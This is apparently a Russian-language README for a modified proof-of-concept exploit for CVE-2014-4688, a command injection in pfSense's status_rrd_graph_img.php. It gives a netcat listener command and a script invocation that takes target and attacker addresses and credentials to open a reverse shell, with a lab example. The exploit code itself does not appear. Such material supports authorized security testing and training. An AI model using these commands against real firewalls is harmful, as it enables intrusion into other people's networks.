
Модифицированный proof-of-concept эксплойт для CVE-2014-4688, уязвимости внедрения команд в pfSense status_rrd_graph_img.php, позволяющий аутентифицированное удаленное выполнение кода с поддержкой SSL.
Модифицированное доказательство концепции Exploit-DB для CVE-2014-4688 (внедрение команд в status_rrd_graph_img.php в pfSense)
Этот репозиторий содержит модифицированную версию оригинального доказательства концепции из Exploit-DB для CVE-2014-4688, затрагивающей pfSense версий ≤ 2.1.3.
Уязвимость существует в компоненте status_rrd_graph_img.php и позволяет аутентифицированным пользователям выполнять произвольные системные команды из-за некорректной санитации входных данных параметра database.
status_rrd_graph_img.phpАутентифицированный пользователь может внедрить произвольные команды оболочки через специально сформированный ввод, отправленный на уязвимую конечную точку.
Запустите слушатель:
nc -lvnp <LPORT>
Доказательство концепции:
python3 cve-2014-4688.py --rhost <TARGET_IP> --lhost <ATTACKER_IP> --lport <PORT> --username <USERNAME> --password <PASSWORD>
python3 cve-2014-4688.py --rhost 10.129.7.193 --lhost 10.10.15.12 --lport 443 --username Joebloggs --password Password
Этот репозиторий предоставлен только для авторизованных исследований в области безопасности, обучения и контролируемого тестирования. Несанкционированное использование против систем без явного разрешения незаконно и неэтично.